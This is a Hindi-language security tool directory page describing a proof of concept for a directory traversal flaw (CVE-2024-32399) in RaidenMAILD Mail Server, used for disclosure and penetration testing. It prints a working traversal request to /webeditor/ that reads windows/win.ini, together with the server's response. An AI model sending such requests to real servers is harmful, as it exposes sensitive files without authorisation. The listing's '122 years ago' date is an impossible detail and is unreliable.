Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-32399 — RaidenMAILD मेल सर्वर <=4.9.4 में निर्देशिका भ्रमण भेद्यता (CVE-2024-32399) के लिए अवधारणा-प्रमाण शोषण, जो /webeditor/ घटक के माध्यम से दूरस्थ संवेदनशील फ़ाइल प्रकटीकरण प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/nn0b0dy/cve-2024-32399
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubnn0b0dy/cve-2024-32399

CVE-2024-32399

RaidenMAILD मेल सर्वर <=4.9.4 में निर्देशिका भ्रमण भेद्यता (CVE-2024-32399) के लिए अवधारणा-प्रमाण शोषण, जो /webeditor/ घटक के माध्यम से दूरस्थ संवेदनशील फ़ाइल प्रकटीकरण प्रदर्शित करता है।

रिपॉजिटरी देखें
122 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-32399

भेद्यता अवलोकन

RaidenMAILD Mail Server v.4.9.4 और उससे पहले के संस्करणों में निर्देशिका भ्रमण (Directory Traversal) भेद्यता एक दूरस्थ हमलावर को /webeditor/ घटक के माध्यम से संवेदनशील जानकारी प्राप्त करने की अनुमति देती है।

भेद्यता प्रकार

निर्देशिका भ्रमण (Directory Traversal)

उत्पाद विक्रेता

RaidenMAILD Mail Server

प्रभावित संस्करण

RaidenMAILD Mail Server <= 4.9.4

प्रूफ ऑफ कॉन्सेप्ट (Proof of Concept)

अनुरोध (Request):

root@kitploit:~
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

प्रतिक्रिया (Response):

root@kitploit:~
HTTP/1.1 200 OK
Connection: close
Content-Disposition: attachment; filename="../../../windows/win.ini";
Content-Type: application/octet-stream
Content-Length: 403
Date: Mon, 22 Apr 2024 15:00:41 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Permissions-Policy: geolocation=(self "https://example.com"), microphone=()
Referrer-Policy: no-referrer
Content-Security-Policy: base-uri 'self'
Set-Cookie: IDHTTPSESSIONID=9E5BgVAlG7P7C5X; Path=/

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
...
...
टूल डाउनलोड करें